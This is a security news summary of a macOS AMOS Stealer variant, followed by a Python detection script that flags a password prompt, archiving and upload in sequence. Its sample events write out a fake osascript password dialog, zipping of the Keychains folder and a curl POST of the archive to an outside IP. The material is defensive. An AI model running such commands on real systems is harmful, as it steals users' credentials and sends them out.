Summary: A new version of AMOS Stealer specifically targeting macOS has emerged, effectively evading detection and exploiting system vulnerabilities to exfiltrate sensitive data. This malware circumvents macOS Gatekeeper through user interaction and is designed to steal credentials, cryptocurrency information, and personal files. Security researcher Tonmoy Jitu has detailed its evasion techniques and functionality in a comprehensive analysis.
Affected: macOS users
Key points:
- Disguised as a DMG file named Installer_v2.7.8.dmg, it bypasses Gatekeeper using a right-click method.
- Undetected by 61 antivirus engines as of March 11, 2025, indicating its sophisticated stealth capabilities.
- Employs anti-VM logic to evade detection in virtual environments and utilizes AppleScript for malicious tasks.
- Targets various personal files and browser data, including cryptocurrency wallet information and system passwords.
- Steals data by archiving files and uploading them to a remote server.
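The key points above describe a behavioural chain (AppleScript for malicious tasks, archiving of files, upload to a remote server) that a defender can look for in endpoint telemetry without relying on signatures, which matters when a sample is still undetected by antivirus engines. The following is an added detection example, not code from the original analysis or from the malware; it assumes process events already normalised into dictionaries with `ts`, `user`, `proc` and `args` fields, and it treats an `osascript` password-style dialog as the first stage, which is an assumption about the AppleScript use rather than a detail taken from the page. The sample events are constructed for illustration.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample process events (illustrative, not real telemetry).
# Each record is assumed to come from an EDR or unified-log export that
# has already been normalised to this shape.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ts": "2025-03-11T09:58:40", "user": "alice", "proc": "zsh", "args": "-l"},
    {"ts": "2025-03-11T10:00:01", "user": "alice", "proc": "osascript",
     "args": '-e display dialog "Enter your password" default answer "" with hidden answer'},
    {"ts": "2025-03-11T10:00:25", "user": "alice", "proc": "zip",
     "args": "-r /tmp/out.zip /Users/alice/Library/Keychains"},
    {"ts": "2025-03-11T10:00:40", "user": "alice", "proc": "curl",
     "args": "-X POST --data-binary @/tmp/out.zip http://198.51.100.7/upload"},
    # Benign-looking activity: an archive with no preceding prompt and a
    # plain download instead of an upload should not be flagged.
    {"ts": "2025-03-11T11:30:00", "user": "bob", "proc": "ditto",
     "args": "-c -k --sequesterRsrc ~/Documents /tmp/docs.zip"},
    {"ts": "2025-03-11T11:31:00", "user": "bob", "proc": "curl",
     "args": "-o /tmp/page.html https://example.com"},
]

# Stage definitions (assumed heuristics, tune to your environment).
PROMPT_PROCS = {"osascript"}
ARCHIVE_PROCS = {"zip", "ditto", "tar"}
UPLOAD_PROCS = {"curl"}
UPLOAD_FLAGS = ("--data-binary", "-F ", "-T ", "--upload-file")


def classify(event: Dict[str, str]) -> Optional[str]:
    """Map one process event to a stage name, or None if it matches nothing.

    'prompt'  : AppleScript dialog that collects a hidden (password-style) answer
    'archive' : archiver writing into /tmp, a common staging location
    'upload'  : curl invoked with a flag that sends a local file
    """
    proc, args = event["proc"], event["args"]
    if proc in PROMPT_PROCS and "display dialog" in args and "hidden answer" in args:
        return "prompt"
    if proc in ARCHIVE_PROCS and "/tmp/" in args:
        return "archive"
    if proc in UPLOAD_PROCS and any(flag in args for flag in UPLOAD_FLAGS):
        return "upload"
    return None


def find_chains(events: List[Dict[str, str]],
                window: timedelta = timedelta(minutes=15)) -> List[Dict[str, str]]:
    """Flag users for whom prompt -> archive -> upload occurs, in order, within `window`.

    Returns one record per completed chain with the timestamps of each stage.
    A lone archive or a lone upload never fires; the ordering is the signal.
    """
    ordered = sorted(events, key=lambda e: e["ts"])
    last_seen: Dict[tuple, datetime] = {}  # (user, stage) -> most recent timestamp
    hits: List[Dict[str, str]] = []
    for event in ordered:
        stage = classify(event)
        if stage is None:
            continue
        ts = datetime.fromisoformat(event["ts"])
        user = event["user"]
        if stage == "upload":
            prompt_ts = last_seen.get((user, "prompt"))
            archive_ts = last_seen.get((user, "archive"))
            if (prompt_ts and archive_ts
                    and prompt_ts <= archive_ts <= ts
                    and ts - prompt_ts <= window):
                hits.append({
                    "user": user,
                    "prompt": prompt_ts.isoformat(),
                    "archive": archive_ts.isoformat(),
                    "upload": ts.isoformat(),
                })
        else:
            last_seen[(user, stage)] = ts
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print("possible staged exfiltration:", hit)
```

Running the script against the constructed events reports one chain for `alice` and nothing for `bob`, whose archive has no preceding credential prompt and whose `curl` only downloads. In practice the stage heuristics would be widened (other archivers, other upload tools, additional staging directories) and the time window tuned, but the principle of alerting on the ordered sequence rather than on any single process stays the same.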
Source: https://securityonline.info/amos-stealer-reloaded-inside-a-fully-undetected-macos-data-heist/